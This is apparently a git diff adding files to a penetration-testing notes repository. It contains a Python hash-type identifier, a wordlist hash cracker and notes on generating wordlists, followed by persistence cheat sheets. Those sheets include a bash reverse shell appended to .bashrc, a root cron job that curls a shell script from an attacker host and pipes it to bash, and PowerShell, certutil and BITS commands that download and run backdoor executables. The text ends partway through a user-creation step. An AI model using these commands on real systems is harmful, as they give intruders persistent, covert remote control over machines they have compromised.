hash.isalnum()==True: + jerar.append("106140") +def NTLM(hash): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") +def RAdminv2x(hash): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") +def RipeMD128(hash): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") +def RipeMD128HMAC(hash): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") +def SNEFRU128(hash): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") +def SNEFRU128HMAC(hash): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") +def Tiger128(hash): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") +def Tiger128HMAC(hash): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") +def md5passsalt(hash): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") +def md5saltmd5pass(hash): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") +def md5saltpass(hash): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") +def md5saltpasssalt(hash): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") +def md5saltpassusername(hash): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") +def md5saltmd5pass(hash): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") +def md5saltmd5passsalt(hash): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") +def md5saltmd5passsalt(hash): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") +def md5saltmd5saltpass(hash): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") +def md5saltmd5md5passsalt(hash): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") +def md5username0pass(hash): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") +def md5usernameLFpass(hash): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") +def md5usernamemd5passsalt(hash): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") +def md5md5pass(hash): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") +def md5md5passsalt(hash): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") +def md5md5passmd5salt(hash): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") +def md5md5saltpass(hash): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") +def md5md5saltmd5pass(hash): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") +def md5md5usernamepasssalt(hash): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") +def md5md5md5pass(hash): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") +def md5md5md5md5pass(hash): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") +def md5md5md5md5md5pass(hash): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") +def md5sha1pass(hash): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") +def md5sha1md5pass(hash): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") +def md5sha1md5sha1pass(hash): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") +def md5strtouppermd5pass(hash): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + +def LineageIIC4(hash): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") +def MD5phpBB3(hash): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") +def MD5Unix(hash): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") +def MD5Wordpress(hash): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + +def MD5APR(hash): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + +def Haval160(hash): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") +def Haval160HMAC(hash): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") +def MySQL5(hash): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") +def MySQL160bit(hash): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") +def RipeMD160(hash): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") +def RipeMD160HMAC(hash): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") +def SHA1(hash): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") +def SHA1HMAC(hash): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") +def SHA1MaNGOS(hash): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") +def SHA1MaNGOS2(hash): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") +def Tiger160(hash): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") +def Tiger160HMAC(hash): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") +def sha1passsalt(hash): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") +def sha1saltpass(hash): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") +def sha1saltmd5pass(hash): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") +def sha1saltmd5passsalt(hash): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") +def sha1saltsha1pass(hash): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") +def sha1saltsha1saltsha1pass(hash): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") +def sha1usernamepass(hash): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") +def sha1usernamepasssalt(hash): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") +def sha1md5pass(hash): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") +def sha1md5passsalt(hash): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") +def sha1md5sha1pass(hash): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") +def sha1sha1pass(hash): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") +def sha1sha1passsalt(hash): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") +def sha1sha1passsubstrpass03(hash): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") +def sha1sha1saltpass(hash): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") +def sha1sha1sha1pass(hash): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") +def sha1strtolowerusernamepass(hash): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + +def Haval192(hash): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") +def Haval192HMAC(hash): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") +def Tiger192(hash): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") +def Tiger192HMAC(hash): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + +def MD5passsaltjoomla1(hash): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + +def SHA1Django(hash): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + +def Haval224(hash): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") +def Haval224HMAC(hash): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") +def SHA224(hash): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") +def SHA224HMAC(hash): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + +def SHA256(hash): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") +def SHA256HMAC(hash): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") +def Haval256(hash): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") +def Haval256HMAC(hash): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") +def GOSTR341194(hash): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") +def RipeMD256(hash): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") +def RipeMD256HMAC(hash): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") +def SNEFRU256(hash): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") +def SNEFRU256HMAC(hash): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") +def SHA256md5pass(hash): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") +def SHA256sha1pass(hash): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + +def MD5passsaltjoomla2(hash): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") +def SAM(hash): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + +def SHA256Django(hash): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + +def RipeMD320(hash): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") +def RipeMD320HMAC(hash): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + +def SHA384(hash): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") +def SHA384HMAC(hash): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + +def SHA256s(hash): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + +def SHA384Django(hash): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + jerar.append("121020") + +def SHA512(hash): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") +def SHA512HMAC(hash): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") +def Whirlpool(hash): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") +def WhirlpoolHMAC(hash): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + +print(logo) +try: + first = str(argv[1]) +except: + first = None + +while True: + try: + jerar=[] + print("-"*50) + if first: + h = first + else: + h = input(" HASH: ") + + ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h) + + if len(jerar)==0: + + print("\n Not Found.") + elif len(jerar)>2: + jerar.sort() + print("\nPossible Hashs:") + print("[+] "+str(algorithms[jerar[0]])) + print("[+] "+str(algorithms[jerar[1]])) + print("\nLeast Possible Hashs:") + for a in range(int(len(jerar))-2): + print("[+] "+str(algorithms[jerar[a+2]])) + else: + jerar.sort() + print("\nPossible Hashs:") + for a in range(len(jerar)): + print("[+] "+str(algorithms[jerar[a]])) + + first = None + except KeyboardInterrupt: + print("\n\n\tBye!") + exit() \ No newline at end of file diff --git a/Hashes/Scripts/hash_cracker.py b/Hashes/Scripts/hash_cracker.py new file mode 100755 index 0000000..ee89b3a --- /dev/null +++ b/Hashes/Scripts/hash_cracker.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python + +import hashlib +import pyfiglet + +print(pyfiglet.figlet_format("md5 cracker")) + +wordlist_location = str(input("Wordlist file location: ")) +hash_input = str(input("Enter hash to be cracked: ")) + +with open(wordlist_location, 'rb') as _f: + for line in _f.readlines(): + line = line.strip() + hash_ob = hashlib.sha256(line) + #hash_ob = hashlib.md5(line) + hashed_pass = hash_ob.hexdigest() + print(line) + if hashed_pass == hash_input: + print("Password found: " + line.decode()) + exit(0) diff --git a/Hashes/Wordlists.md b/Hashes/Wordlists.md new file mode 100644 index 0000000..40899ab --- /dev/null +++ b/Hashes/Wordlists.md @@ -0,0 +1,48 @@ +# Generate Wordlists + +* [username_generator](https://github.com/therodri2/username_generator.git) +* [CeWL](../enumeration/CeWL/README.md) +* [Mentalist](https://github.com/sc0tfree/mentalist.git) +* [lyricpass](https://github.com/initstring/lyricpass.git) +* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git) + + +## Cupp + +* [cupp](https://github.com/Mebus/cupp.git) + * Interactive dialogue via `cupp.py -i` + * Wordlistdownload via `cupp.py -l` + * Connections to alecto DB via `-a` + +## crunch + +```sh +crunch -o +``` + +* Option `-t` specifies variable characters + * `@`, lower case alpha characters + * `,`, upper case alpha characters + * `%`, numeric characters + * `^`, special characters including space +```sh +crunch 8 8 -t passw%%rd +``` + +## ttpassgen +* [ttpassgen](https://github.com/tp7309/TTPassGen.git) +* Generate lists from the ground up +* `pip install ttpassgen` +```sh +ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt +``` +```sh +ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt +``` +```sh +ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt +``` + +# exrex + +* Generate all possible outcomes from regex string diff --git a/Persistence/bashrc.md b/Persistence/bashrc.md new file mode 100644 index 0000000..bcd46a5 --- /dev/null +++ b/Persistence/bashrc.md @@ -0,0 +1,8 @@ +# Bashrc Bogus + +## Add Reverse Shell +```sh +echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc +``` + + diff --git a/Persistence/crontab.md b/Persistence/crontab.md new file mode 100644 index 0000000..50df63c --- /dev/null +++ b/Persistence/crontab.md @@ -0,0 +1,15 @@ +# Cronjobs + +* `crontab -l` +* `cat /etc/crontab` + +## Add Cronjob +* Add line +```sh +* * * * * root curl http://:8000/shell.sh | bash +``` + * Shell content + ```sh + bash -c "bash -i >& /dev/tcp// 0&1" + ``` + diff --git a/Persistence/meterpreter.md b/Persistence/meterpreter.md new file mode 100644 index 0000000..e13b02c --- /dev/null +++ b/Persistence/meterpreter.md @@ -0,0 +1,6 @@ +# Meterpreter Persistence + +## Load shell on system startup +```sh +run persistence -X +``` diff --git a/Persistence/persistence.md b/Persistence/persistence.md new file mode 100644 index 0000000..065d02a --- /dev/null +++ b/Persistence/persistence.md @@ -0,0 +1,323 @@ +# Persistence + +* Gain through + * Startup folder persistence + * Editing registry keys + * Scheduled tasks + * SUID + * BITS + * Creating a backdoored service + * Creat user + * RDP + +## Gain Persistence on Windows +* Browser. Add to trusted sites. +* Powershell +```sh +Invoke-WebRequest http://:/shell.exe -OutFile .\shell2.exe +``` +* DOSprompt +```cmd +certutil -urlcache -split -f http://:\AppData\Roaming\backdoor.exe" +``` +### Background Intelligence Transfer Service (BITS) +```sh +bitsadmin /create __shell__ +bitsadmin /addfile __shell__ "http://:/shell2.exe" "C:\Users\\Documents\shell2.exe" +``` +```sh +bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\\Documents\shell2.exe" +bitsadmin /SetMinRetryDelay 30 +bitsadmin /resume +``` + +## Elevate Privileges +* Create user `net user /add ` +* Add to admin group via 